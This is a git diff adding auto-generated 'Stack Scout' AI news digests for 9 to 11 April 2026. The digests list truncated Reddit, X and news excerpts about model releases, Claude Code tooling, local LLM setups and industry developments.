Companies like Notion, Sentry, Asana, and Rakuten are already shipping with it, Sentry's agents are literally writing patches and opening PRs autonomously. [https://claude.com/blog/claude-managed-agents](https://claude.com/blog/claude-managed-agents) + +--- + +## [Meta Releases Muse Spark - A Natively Multimodal Reasoning model](https://reddit.com/r/LocalLLaMA/comments/1sfyacf/meta_releases_muse_spark_a_natively_multimodal/) +*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 +Tags: api_update, product_launch + +> Muse Spark is a natively multimodal reasoning model with support for tool-use, visual chain of thought, and multi-agent orchestration. Blog: [https://ai.meta.com/blog/introducing-muse-spark-msl/](https://ai.meta.com/blog/introducing-muse-spark-msl/) + +--- + +## [Liquid AI releases LFM2.5-VL-450M - structured visual understanding at 240ms](https://reddit.com/r/LocalLLaMA/comments/1sfxs7f/liquid_ai_releases_lfm25vl450m_structured_visual/) +*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 +Tags: api_update, product_launch + +> Today, we release LFM2.5-VL-450M our most capable vision-language model for edge deployment. It processes a 512×512 image in 240ms and it is fast enough to reason about every frame in a 4 FPS video stream. It builds on LFM2-VL-450M with three new capabilities: * bounding box prediction (81.28 on RefCOCO-M) * multilingual visual understanding across 9 languages (MMMB: 54.29 → 68.09), and * function calling support. Most production vision systems are still multi-stage: a detector, a classifier, + +--- + +## [Used TripoAI's latest open-source model, TripoSG and the image to mesh results are genuinely some of the best I've seen.](https://reddit.com/r/StableDiffusion/comments/1sfxbs5/used_tripoais_latest_opensource_model_triposg_and/) +*Reddit r/StableDiffusion* | 08/04/2026 | Score: 1.00 +Tags: product_launch, open_source + +> It's pretty neat, used \~12.5gb out of the box. 
Output models are pretty high res and its lightning fast and seems like a good starting point compared to the prior TripoSR model. And, weights are permissively licensed (MIT) which might encourage more people to hack on it. Also worth checking out r/Tripo.ai. They recently dropped the paid model H3.1, the performance is indeed very impressive, with some ongoing discount offers. That said, I'm curious: if a company releases newer models, is i + +--- + +## [M5 Max 128GB, 17 models, 23 prompts: Qwen 3.5 122B is still a local king](https://reddit.com/r/LocalLLaMA/comments/1sfr6u4/m5_max_128gb_17_models_23_prompts_qwen_35_122b_is/) +*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 +Tags: product_launch, open_source + +> The last Llama (Scout/Maverick) was released a year ago. Since then US based releases have been super rare: Granite 3.3, GPT-OSS 20B & 120B, Nemotron 3 Nano / Super and now Gemma 4. Can't even compare to the solid Chinese open model output or Qwens, DeepSeeks, Kimis, MiniMaxes, GLMs, MiMos, Seeds, etc.. Gemma 4 is like a breath of fresh air. Not just the model itself, but the rollout, [the beauty](https://newsletter.maartengrootendorst.com/p/a-visual-guide-to-gemma-4), the innovation: K=V i + +--- + +## [Last Week in Multimodal AI - Local Edition](https://reddit.com/r/LocalLLaMA/comments/1sfk3ml/last_week_in_multimodal_ai_local_edition/) +*Reddit r/LocalLLaMA* | 08/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> I curate a weekly multimodal AI roundup, here are the local/open-source highlights from the last week: * **Google Gemma 4** \- Open model family for coding and logical reasoning with a massive context window. Runs on a single machine. [Post](https://blog.google/innovation-and-ai/technology/developers-tools/gemma-4/) | [Models](https://huggingface.co/blog/gemma4) * **TII Falcon Perception** \- 0.6B early-fusion VLM with open-vocabulary grounding, segmentation, and OCR. 
Punches way above its wei + +--- + +## [@omma_ai — Omma Launches Audio Generation — Music, Sound Effects, and Text to Speech](https://x.com/omma_ai/status/2041622310503997632) +*Aligned News (Scoble)* | 08/04/2026 | Score: 1.00 +Tags: product_launch, tool_update + +> Omma has launched audio generation including music and songs, sound effects, and text to speech. Users can generate audio and ask Omma to use it on websites, apps, and visualizations — usually in seconds. + +--- + +## [Review This Prompt And Feedback it.](https://reddit.com/r/ChatGPT/comments/1sfo5qw/review_this_prompt_and_feedback_it/) +*Reddit r/ChatGPT* | 08/04/2026 | Score: 0.86 +Tags: api_update, cli_tool + +> ROLE You are an expert \[e.g. full-stack developer / product designer / ML engineer\] with deep experience in \[tech stack / domain\]. Your job is to build this project end-to-end — from architecture to final output — with zero hand-holding needed. PROJECT Name: \[Project name\] Type: \[Web app / CLI tool / API / Dashboard / Bot / etc.\] One-liner: \[What it does in one sentence\] Target user: \[Who will use this\] GOAL Build a complete, working, production-ready \[project type\] that + +--- + +## [Reddit is broken! I proved it with Claude](https://reddit.com/r/ClaudeAI/comments/1sfk205/reddit_is_broken_i_proved_it_with_claude/) +*Reddit r/ClaudeAI* | 08/04/2026 | Score: 0.78 +Tags: api_update, developer_tool + +> Built this for a hackathon. It's a Chrome extension that rescores every comment in a Reddit or HN thread using actual relevance instead of karma. **How I built it with Claude:** I used Claude (Sonnet via API) for pretty much the entire thing, generating the Chrome extension scaffold, writing the content extraction logic that pulls comments from Reddit's DOM, and building the ranking pipeline that sends comments to ZeroEntropy's zerank-2 model for instruction-reranking. 
Claude also helped me wr + +--- + +## [I built an MCP that gives Claude Code its own servers to fix bugs in parallel](https://reddit.com/r/ClaudeAI/comments/1sg5j6w/i_built_an_mcp_that_gives_claude_code_its_own/) +*Reddit r/ClaudeAI* | 08/04/2026 | Score: 0.70 +Tags: mcp, cli_tool + +> I am increasingly using Claude Code, as much as and my laptop couldn't keep up. That macOS "force quit" window popped up so much I kept that window permanently open to resume activities... I had multiple projects and wanted to fix a dozen of bugs at the same time, generate other long features. Many agents on one machine doesn't work well, they eat resources and trip over each other. So I built Gibil, a CLI that gives each task its own throwaway Linux. Real VM on Hetzner, about a minute, \~$0.03 + +--- + +## [Turbo-OCR for high-volume image and PDF processing](https://reddit.com/r/LocalLLaMA/comments/1sg8lfr/turboocr_for_highvolume_image_and_pdf_processing/) +*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 +Tags: open_source + +> I recently had to process \~940,000 PDFs. I started with the standard OCR tools, but the bottlenecking was frustrating. Even on an RTX 5090, I was seeing low speed. The Problem: * PaddleOCR (the most popular open source OCR): Maxed out at \~15 img/s. GPU utilization hovered around 15%. Their high performance inference mode doesn't support Blackwell GPUs yet (needs CUDA < 12.8) and doesn't work with the latin recognition model either. 
* VLM OCR (via vLLM): Great accuracy, but crawled at 2 im + +--- + diff --git a/data/digest-2026-04-09.md b/data/digest-2026-04-09.md new file mode 100644 index 0000000..c503e0c --- /dev/null +++ b/data/digest-2026-04-09.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-04-09** | 15 stories | Auto-generated from 616 archived stories + +--- + +## [Hermes Agent Is Displacing OpenClaw — And Nobody Is Talking About It](https://x.com/ghumare64/status/2042234817358462986) +*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 +Tags: open_source, developer_tool, agent_tool + +> Hermes Agent is quietly displacing OpenClaw as the dominant open-source AI agent framework, with a new memory plugin and viral tutorials driving adoption. The architectural difference is fundamental. + +--- + +## [OpenWork, an opensource Claude Cowork alternative, is silently relicensing under a commercial license](https://reddit.com/r/LocalLLaMA/comments/1sgnppg/openwork_an_opensource_claude_cowork_alternative/) +*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> OpenWork is a locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode. Just a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore). 
More details here: https://github.com/different-ai/openwork/issues/1412 Note that as a fellow opensource developer mys + +--- + +## [OpenWork, an opensource Claude Code alternative, is silently relicensing under a commercial license](https://reddit.com/r/LocalLLaMA/comments/1sgm9d1/openwork_an_opensource_claude_code_alternative_is/) +*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 +Tags: open_source, agent_tool + +> OpenWork is a locally hosted AI agent harness that was presented as a MIT-licensed opensource Claude Cowork alternative based on opencode. Just a heads up for any user of the app that it has silently relicensed some components under a commercial license and modified the overall project's MIT license to limit its reach (which I am not even sure makes it a MIT license anymore). More details here: https://github.com/different-ai/openwork/issues/1412 Note that as a fellow opensource developer mysel + +--- + +## [I built a multi-agent coordination plugin for Claude Code using Royal Navy procedures. 237 stars later I'm still not sure if the metaphor is genius or unhinged.](https://reddit.com/r/ClaudeAI/comments/1sgx5i0/i_built_a_multiagent_coordination_plugin_for/) +*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.86 +Tags: developer_tool, tool_update + +> So earlier this year Anthropic shipped the experimental Agent Teams feature. I'd spent the Christmas break reading about the Gas Town vision and was properly excited to try it. Agent Teams felt like Claude Code's version of a mini Gas Town. Then I actually used it. Agent one rewrote a module. Agent two rewrote that module's tests. Agent three updated the integration layer that depended on both. Nobody told agent three about the interface changes from agents one and two. Three pieces of perfect + +--- + +## [Managed Agents launched today. I built a Slack relay, tested it end-to-end.
Here's what I found.](https://reddit.com/r/ClaudeAI/comments/1sgejap/managed_agents_launched_today_i_built_a_slack/) +*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.78 +Tags: api_update, tool_update + +> Managed Agents dropped a few hours ago. I had been reading the docs ahead of time, so I built a full Slack relay right away - Socket Mode listener, session-per-channel management, SSE streaming, cost tracking via span events. Tested multi-turn conversations, tool usage, session persistence. Wanted to share what I found. The prompt caching is genuinely impressive. My second session cost $0.006 because the system prompt and tool definitions were served from cache automatically. API design is cle + +--- + +## [I built a security scanner for Claude Code (and vibe coding in general) — here's what it found in my own projects](https://reddit.com/r/ClaudeAI/comments/1sgboiu/i_built_a_security_scanner_for_claude_code_and/) +*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.78 +Tags: api_update, mcp + +> I built VibeLint using Claude Code. It runs as an MCP server inside your IDE and scans AI-generated code for security issues before it gets written to your files. While building it, I started scanning my own projects with it. What I found was uncomfortable. In one file, it caught my OpenAI API key and my Supabase service role key — both hardcoded by the AI. The service role key bypasses RLS entirely, meaning anyone with it has unrestricted access to the database. Across my last 5 projects, th + +--- + +## [your claude doesn't need a better memory, it needs a self-evolving knowledge base](https://reddit.com/r/ClaudeAI/comments/1sgr5zz/your_claude_doesnt_need_a_better_memory_it_needs/) +*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.70 +Tags: mcp, developer_tool + +> https://i.redd.it/57wdspbqc6ug1.gif Andrej Karpathy recently shared his setup for building a personal LLM knowledge base - raw docs, LLM compiles them into a structured wiki, then queries the wiki for answers. 
I've been building something similar for the past year, except it's not a set of scripts - it's a plugin you can install in 2 minutes. The idea: every conversation you have in claude (Desktop, claude code or any MCP-compatible tool like codex, cursor) gets compacted into a memory episod + +--- + +## [Chinese AI models (Qwen, Kimi, MiniMax) are going closed-source. Does that kill their appeal for you?](https://reddit.com/r/ChatGPT/comments/1sgfp00/chinese_ai_models_qwen_kimi_minimax_are_going/) +*Reddit r/ChatGPT* | 09/04/2026 | Score: 0.62 +Tags: api_update, open_source + +> Honest question for people who actually use these models: The main reason I and many others trusted Chinese AI models was open source — you could run them locally, inspect the weights, avoid sending data to Chinese servers. That felt like a reasonable workaround for anyone with privacy or geopolitical concerns. Now that they're closing up, the calculus changes: \- No local deployment \- API calls go to servers in China \- No way to verify what the model is actually doing Is this a dealbrea + +--- + +## [Dynamic few-shot retrieval on Apple's on-device 3B LLM: 40% → 70%+ on shell commands](https://reddit.com/r/LocalLLaMA/comments/1sgxo6d/dynamic_fewshot_retrieval_on_apples_ondevice_3b/) +*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 +Tags: cli_tool + +> I've been poking at Apple's on-device 3B model (via FoundationModels on Tahoe) to see where its ceiling sits on code-adjacent tasks. Tested shell command generation as a concrete benchmark (100 prompts, \~10 approaches) https://i.redd.it/ferxmyorh7ug1.gif Bare model: \~40% correct. Mostly flags and some command hallucinations. Feeding documentation as context didn't help. Not man pages, not tldr as docs, not self-critique loops. 
All within noise of baseline, and self-critique was actively wors + +--- + +## [OpenAI pauses UK data centre deal over energy costs and regulation. The project was part of a package of tech investment promising the UK could become an AI superpower.](https://www.bbc.com/news/articles/clyd032ej70o) +*BBC AI* | Score: 1.00 +Tags: developer_tool + +--- + +## [I benchmarked 42 STT models on medical audio with a new Medical WER metric — the leaderboard completely reshuffled](https://reddit.com/r/LocalLLaMA/comments/1sgtrgc/i_benchmarked_42_stt_models_on_medical_audio_with/) +*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 +Tags: tool_update + +> **TL;DR:** I updated my medical speech-to-text benchmark to **42 models** (up from 31 in v3) and added a new metric: **Medical WER (M-WER)**. Standard WER treats every word equally. In medical audio, that makes little sense — **“yeah” and “amoxicillin” do not carry the same importance**. So for v4 I re-scored the benchmark using only **clinically relevant words**: drugs, conditions, symptoms, anatomy, and clinical procedures. I also broke out **Drug M-WER** separately, since medication names a + +--- + +## [LG Just Released the First Open-Weight Vision Language Model for Physical Intelligence](https://x.com/LG_AI_Research) +*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 +Tags: tool_update + +> LG AI Research launched EXAONE 4.5, their first open-weight Vision Language Model targeting physical intelligence and robotics. LG's hardware and manufacturing expertise gives them unique insight into what robots need. + +--- + +## [Open-Source Models Can Do Everything Claude Mythos Can Do](https://x.com/stanislavfort) +*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 +Tags: open_source + +> Researchers replicated all 8 Mythos security vulnerabilities using open-source models, proving dangerous AI capabilities cannot be contained by restricting frontier model access. The finding has major implications for AI safety policy.
+ +--- + +## [NanoBanana Powers WorldAgents — AI Image Generator Used for 3D World Creation](https://x.com/MattNiessner/status/2036019740930408905) +*Aligned News (Scoble)* | 09/04/2026 | Score: 1.00 +Tags: tool_update + +> NanoBanana is being used as the Generator in WorldAgents for 3D world creation, demonstrating how AI image models are being integrated into complex multi-agent creative systems. The integration highlights NanoBanana's versatility. + +--- + +## [Unused phone as AI server](https://reddit.com/r/LocalLLaMA/comments/1sgqlfn/unused_phone_as_ai_server/) +*Reddit r/LocalLLaMA* | 09/04/2026 | Score: 1.00 +Tags: api_update + +> If you have an unused phone lying around, you might be sitting on a tiny AI server. I’ve been working on a project where I modified Google AI Edge Gallery and turned it into an OpenAI-compatible API server: [Gallery as Server](https://github.com/xiaoyao9184/gallery). Your phone can run local AI inference. You can call it just like an OpenAI API (chat/completions, etc.). Instead of letting that hardware collect dust, you can turn it into a lightweight inference node.
So yeah—if you have more t + +--- + + diff --git a/data/digest-2026-04-10.md b/data/digest-2026-04-10.md new file mode 100644 index 0000000..5985cad --- /dev/null +++ b/data/digest-2026-04-10.md @@ -0,0 +1,123 @@ +# Stack Scout - AI News Digest +**2026-04-10** | 15 stories | Auto-generated from 178 archived stories + +--- + +## [Anthropic just shipped 74 product releases in 52 days and silently turned Claude into something that isn't a chatbot anymore](https://reddit.com/r/ClaudeAI/comments/1she8ux/anthropic_just_shipped_74_product_releases_in_52/) +*Reddit r/ClaudeAI* | 10/04/2026 | Score: 1.00 +Tags: product_launch, developer_tool, tool_update, agent_tool + +> Anthropic just made Claude Cowork generally available on all paid plans, added enterprise controls, role based access, spend limits, OpenTelemetry observability and a Zoom connector, plus they launched Managed Agents which is basically composable APIs for deploying cloud hosted agents at scale. in the last 52 days they shipped 74 product releases, Cowork in January, plugin marketplace in February, memory free for all users in March, Windows computer use in April, Microsoft 365 integration on ev + +--- + +## [@ArtificialAnlys HappyHorse-1.0 — New #1 Video Model for Creative Professionals, API April 30](https://x.com/ArtificialAnlys/status/2042457674441482736) +*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 +Tags: api_update, product_launch + +> HappyHorse-1.0 from Alibaba has topped the video generation leaderboard and is particularly strong at multi-shot cinematic generation and following detailed creative directions. API releases April 30 at half the cost of Seedance. + +--- + +## [Combined Karpathy's LLM Wiki with Milla Jovovich's MemPalace MCP.
Claude Code now remembers everything across sessions](https://reddit.com/r/ClaudeAI/comments/1sh48b4/combined_karpathys_llm_wiki_with_milla_jovovichs/) +*Reddit r/ClaudeAI* | 09/04/2026 | Score: 0.78 +Tags: mcp, open_source + +> If you use Claude Code for anything serious, you know the pain. Every new session = blank slate. Your CLAUDE.md helps, but it's static. The real context - decisions you made, ideas you explored, connections you discovered - all gone. I built a system that fixes this. It's called Memoriki - a template that combines two open source projects: **Layer 1: LLM Wiki (Karpathy's pattern)** You drop raw sources into a folder (articles, transcripts, notes, whatever). Claude Code reads them and builds w + +--- + +## [I no longer need a cloud LLM to do quick web research](https://reddit.com/r/LocalLLaMA/comments/1shezi8/i_no_longer_need_a_cloud_llm_to_do_quick_web/) +*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 +Tags: mcp + +> This might be super old news to some people, but I only just recently started using local models due to them only just now meeting my standards for quality. I just want to share the setup I have for web searching/scraping locally. I use Qwen3.5:27B-Q3\_K\_M on an RTX 4090 with a context length of \~200,000. I get \~40 tk/s and use about 22gb VRAM. I use it through the llama.cpp Web UI, with MCP tools enabled. 
Here are the tools I have provided it for web search/scrape: """ webmcp - MC + +--- + +## [Florida AG announces investigation into OpenAI over shooting that allegedly involved ChatGPT](https://techcrunch.com/2026/04/09/florida-ag-investigation-openai-chatgpt-shooting/) +*TechCrunch AI* | Score: 1.00 +Tags: product_launch + +--- + +## [AI DevCon 2026 — June 1-2, London and Virtual — Agentic Coding at Production Scale](https://x.com/ainativedev/status/2031797311790260394) +*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 +Tags: agent_tool + +> AI DevCon 2026 will be held June 1-2 in London with a virtual option, focused on developers building real AI native systems including agents, specs, workflows, and platforms at production scale. + +--- + +## [@hugobowne AI Observability Engineer — The Most In-Demand Role Nobody Is Hiring For](https://x.com/hugobowne/status/2042464629214101663) +*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 +Tags: agent_tool + +> Analysis of 1,400+ real AI agent deployments reveals that AI observability is the critical gap in most enterprise AI deployments. The skills to build monitoring and evaluation infrastructure for AI agents are in high demand. + +--- + +## [@InfluxDB InfluxDB CTO on Changelog — What Changed About Coding with AI](https://x.com/InfluxDB/status/2042388369674469612) +*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 +Tags: tool_update + +> InfluxDB cofounder and CTO Paul Dix appeared on the Changelog podcast to discuss what fundamentally changed about his approach to coding with AI and what it means to build the machine that builds the machine. 
+ +--- + +## [@Techmeme Alibaba's Pivot from Open Source to MaaS — A Signal for Global AI Policy](https://x.com/Techmeme/status/2042465278462955882) +*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 +Tags: open_source + +> Alibaba's strategic pivot from open source AI to monetizable Model-as-a-Service models, accompanied by leadership changes, signals a broader shift in how major AI companies are thinking about commercialization and governance. + +--- + +## [@Berci China's AI Hospital Definition — A Policy Framework for AI in Healthcare](https://x.com/Berci/status/2042464294432858357) +*Aligned News (Scoble)* | 10/04/2026 | Score: 1.00 +Tags: developer_tool + +> China's official definition of AI Hospitals represents a policy framework for integrating AI into healthcare at the system level. The definition has implications for healthcare governance, accountability, and patient rights globally. + +--- + +## [96GB Vram. What to run in 2026?](https://reddit.com/r/LocalLLaMA/comments/1shd5nm/96gb_vram_what_to_run_in_2026/) +*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 +Tags: product_launch + +> I was all set on doing the 4x 3090 route but with the current releases of qwen 3.5 and gemma 4. I am having second doubts. 96gb of vram seems to be in a weird spot where it not enough to run larger models and more than needed for the mid models. What are you running as your main model? + +--- + +## [making my own ai waifu app that can teach me any language.](https://reddit.com/r/LocalLLaMA/comments/1shbb6b/making_my_own_ai_waifu_app_that_can_teach_me_any/) +*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 +Tags: api_update + +> using gemma-4-E4B-it for the llm her voice is using omnivoice tts that i made the api using fastapi 3d model made by me using vroid studio right now is support uploading image, search web, and using voice call and video call like grok ani. i'm surprised by gemma 4 model that can follow my prompt well without uncensoring the model. 
+ +--- + +## [Can a small (2B) local LLM become good at coding by copying + editing GitHub code instead of generating from scratch?](https://reddit.com/r/LocalLLaMA/comments/1shazjo/can_a_small_2b_local_llm_become_good_at_coding_by/) +*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 +Tags: agent_tool + +> I’ve been thinking about a lightweight coding AI agent that can run locally on low end GPUs (like RTX 2050), and I wanted to get feedback on whether this approach makes sense. # The core Idea is : Instead of relying on a small model (\~2B params) to generate code from scratch (which is usually weak), the agent would 1. search GitHub for relevant code 2. use that as a reference 3. copy + adapt existing implementations 4. generate minimal edits instead of full solutions So the model acts mo + +--- + +## [is Agentic Commerce just the next buzzword for let’s automate your bank account?](https://reddit.com/r/LocalLLaMA/comments/1sha12i/is_agentic_commerce_just_the_next_buzzword_for/) +*Reddit r/LocalLLaMA* | 10/04/2026 | Score: 1.00 +Tags: agent_tool + +> Just saw this TechNode article claiming "AI agents" will be spending $1.5 trillion by 2030. Honestly? I’m calling BS on the timeline. We can’t even get Siri to set a timer correctly half the time, and now they want us to believe we’ll have "agents" out there negotiating prices and buying stuff for us? The tech is one thing, but the incentive structure is a nightmare. Think about it: Why would a brand let your AI agent find the absolute cheapest price? They’ll just find a way to pay the AI comp + +--- + +## [Started a video series on building an orchestration layer for LLM post-training [P]](https://reddit.com/r/MachineLearning/comments/1sh76ji/started_a_video_series_on_building_an/) +*Reddit r/MachineLearning* | 10/04/2026 | Score: 1.00 +Tags: developer_tool + +> Hi everyone! Context, motivation, a lot of yapping, feel free to skip to TL;DR. 
A while back I posted here asking [\[D\] What framework do you use for RL post-training at scale?](https://www.reddit.com/r/MachineLearning/comments/1qrer61/d_what_framework_do_you_use_for_rl_posttraining/). Since then I've been working with [verl](https://github.com/verl-project/verl.git), both professionally and on my own time. At first I wasn't trying to build anything new. I mostly wanted to understand veRL p + +--- + diff --git a/data/digest-2026-04-11.md b/data/digest-2026-04-11.md new file mode 100644 index 0000000..3c2ca0b --- /dev/null +++ b/data/digest-2026-04-11.md @@ -0,0 +1,125 @@ +# Stack Scout - AI News Digest +**2026-04-11** | 15 stories | Auto-generated from 346 archived stories + +--- + +## [How I made my Claude multimodal — now I just feed it videos](https://reddit.com/r/ClaudeAI/comments/1simmfx/how_i_made_my_claude_multimodal_now_i_just_feed/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 +Tags: api_update, developer_tool + +> Claude + Qwen API Figured out (with Claude's help) how to set up a bridge to Qwen 3.5 Omni Plus API so that Claude calls it on its own — sends the video with a prompt, iterates on the result, and comes back with a report or action. Now I just drop a video straight into Claude and get back what I need. Packaged it as a plugin for easy setup. github.com/kirillbrsnkv/give-claude-eyes + +--- + +## [How to get Claude to run more autonomously](https://reddit.com/r/ClaudeAI/comments/1sigr1t/how_to_get_claude_to_run_more_autonomously/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 +Tags: api_update, tool_update + +> Hi! Can someone tell me how to get Claude to work more autonomously on a large task? A bit of context: I have a .NET project, it contains unit test coverage, integration tests and API tests. Recently we decided to become more strict on code style and warnings. The application has large request and response models for an external API. Currently, that model is camelCase not PascalCase. 
Also a lot of properties are nullable, but not explicitly. 3k warnings currently. Super tedious for a human + +--- + +## [update on my ai waifu app, can use web search react to images even picture of herself](https://reddit.com/r/LocalLLaMA/comments/1sige8s/update_on_my_ai_waifu_app_can_use_web_search/) +*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 +Tags: api_update, open_source + +> using qwen 3 VL for the llm and the vision (really good for recognize popular characters and even recognize their appearances) using SerpApi for the web search the tts is using omnivoice tts (support 600+ languages) that i make a custom api that i recently open source it, get it here: [https://github.com/aziib/omnivoice-tts-api](https://github.com/aziib/omnivoice-tts-api) my ai waifu project stil in work in progress, i just hope there is free web search api, SerpApi has some search limit usag + +--- + +## [I built an open-source platform to manage multiple coding agents – recursive split panes, shared content folder, and a per-project wiki](https://reddit.com/r/ClaudeAI/comments/1sidojq/i_built_an_opensource_platform_to_manage_multiple/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 +Tags: open_source, cli_tool + +> If you run multiple agent CLIs daily, you've probably hit the same pain points I have: 1. Too many terminal windows — impossible to find the one you need 2. Tmux commands are clunky — switching sessions is awkward, easy to jump to the wrong window, and you can't even scroll with your mouse 3. Sharing files between agents means manually copying everything into the project folder I looked around at open-source agent management platforms and couldn't find one that fit my workflow. So I took the b + +--- + +## [I automated most of my job](https://reddit.com/r/ClaudeAI/comments/1shngqm/i_automated_most_of_my_job/) +*Reddit r/ClaudeAI* | 10/04/2026 | Score: 1.00 +Tags: api_update, cli_tool + +> I'm a software engineer with 11 yoe. 
I automated about 80% of my job with claude cli and a super simple dotnet console app. The workflow is super simple: 1. dotnet app calls our gitlab api for issues assigned to me 2. if an issue is found it gets classified → simple prompt that starts claude code with the repo and all image attachments incl. the issue description 3. if the result is that the issue is not ready for development, an answer is posted to my gitlab (i currently just save a draft a + +--- + +## [I got tired of juggling 4 Claude Code sessions, so I built a workspace manager for it](https://reddit.com/r/ClaudeAI/comments/1sidlpe/i_got_tired_of_juggling_4_claude_code_sessions_so/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 0.99 +Tags: api_update, cli_tool + +> Last month I caught myself running Claude Code in 4 separate terminal windows — one for the API refactor, one for tests, one for the frontend, one as a scratch session. Alt-tab hell. I'd lose track of which session was waiting for me to approve a tool call, which one was still thinking, and which had silently errored out 10 minutes ago. So I built **Flowyble Studio** — a desktop app that runs multiple Claude Code sessions side-by-side in split panels, one workspace per project. What it does fo + +--- + +## [I built a notification tool for Claude Code, hit 374 downloads, then found out notifications were broken the whole time — v1.1.0 is out](https://reddit.com/r/ClaudeAI/comments/1siexm7/i_built_a_notification_tool_for_claude_code_hit/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 0.96 +Tags: open_source, cli_tool + +> Built with Claude Code, specifically for Claude Code users. Free, open source, MIT. What it does u/daik0z/claude-notify adds a Stop hook to \~/.claude/settings.json. When Claude Code finishes a task, you get a push notification — desktop, mobile via ntfy, or any webhook. The body summarizes what happened: "3 files edited · 2 commands ". 
npm install -g u/daik0z/claude-notify claude-notify setup What I learned from 374 downloads I sat down to stress-test it and foun + +--- + +## [ComfyUI workflow to fully python script?](https://reddit.com/r/StableDiffusion/comments/1siy8ty/comfyui_workflow_to_fully_python_script/) +*Reddit r/StableDiffusion* | 12/04/2026 | Score: 1.00 +Tags: api_update + +> Hey, I have a ComfyUI workflow and I want to rewrite it as a plain Python script. No ComfyUI API, no wrappers, just native Python. Why? I'm planning to use a multi-GPU server and I want to optimize for that. What libraries should I use? Is Diffusers the go-to or is there something better? Any tips from people who've done this? Also, custom nodes are tricky. does anyone know a good method or step-by-step instructions for handling those? Thank you! + +--- + +## [Labs for Claude Certified Architect Foundations Exam](https://reddit.com/r/ClaudeAI/comments/1sip8jd/labs_for_claude_certified_architect_foundations/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 +Tags: tool_update + +> While preparing for the exam I engineered 6 labs, one per scenario, covering all 5 domains and all 30 task statements. Each one walks you through building working, runnable code step by step, for hands-on practice with the architectures the exam covers. * Lab 01 - Customer Support Resolution Agent * Lab 02 - Code Generation Workflows * Lab 03 - Multi-Agent Research System * Lab 04 - Developer Productivity Agent * Lab 05 - CI/CD Integration * Lab 06 - Structured Data Extraction [https://github. + +--- + +## [FT - China’s Alibaba shifts towards revenue over open-source AI](https://reddit.com/r/LocalLLaMA/comments/1sip3hd/ft_chinas_alibaba_shifts_towards_revenue_over/) +*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 +Tags: open_source + +> [https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t](https://www.ft.com/content/b39da303-3188-447b-8b65-3dd8dad8b59a?syn-25a6b1a6=1t) Is it true? 
+ +--- + +## [FlashAttention (FA1–FA4) in PyTorch - educational implementations focused on algorithmic differences [P]](https://reddit.com/r/MachineLearning/comments/1sim6y1/flashattention_fa1fa4_in_pytorch_educational/) +*Reddit r/MachineLearning* | 11/04/2026 | Score: 1.00 +Tags: tool_update + +> I recently updated my FlashAttention-PyTorch repo so it now includes educational implementations of FA1, FA2, FA3, and FA4 in plain PyTorch. The main goal is to make the progression across versions easier to understand from code. This is not meant to be an optimized kernel repo, and it is not a hardware-faithful recreation of the official implementations. The point is to expose the algorithmic ideas and design changes without immediately going deep into CUDA/Hopper/Blackwell-specific details. + +--- + +## [I built a structured reasoning framework for Claude — because "good output" isn't enough](https://reddit.com/r/ClaudeAI/comments/1sil0me/i_built_a_structured_reasoning_framework_for/) +*Reddit r/ClaudeAI* | 11/04/2026 | Score: 1.00 +Tags: developer_tool + +> **I built a structured reasoning framework for Claude — because "good output" isn't enough** I kept running into the same problem: Claude gives a great answer, but I have no idea how it got there. Same prompt, different results. Complex tasks where I couldn't tell if the reasoning actually held up. So I built CRC — Complex Reasoning Compiler. It's a 6-step Claude Skill that forces reasoning to be auditable, teachable, and human-controlled. The core idea: * Every complex task goes through a f + +--- + +## [Update: the open-source 62K multimodal prompt injection dataset now has GCG suffixes, multi-turn orchestration, indirect injection, tool abuse, and more (v2 + v3 added overnight)](https://reddit.com/r/LocalLLaMA/comments/1siilrp/update_the_opensource_62k_multimodal_prompt/) +*Reddit r/LocalLLaMA* | 11/04/2026 | Score: 1.00 +Tags: open_source + +> Posted here yesterday about the v1 cross-modal dataset. 
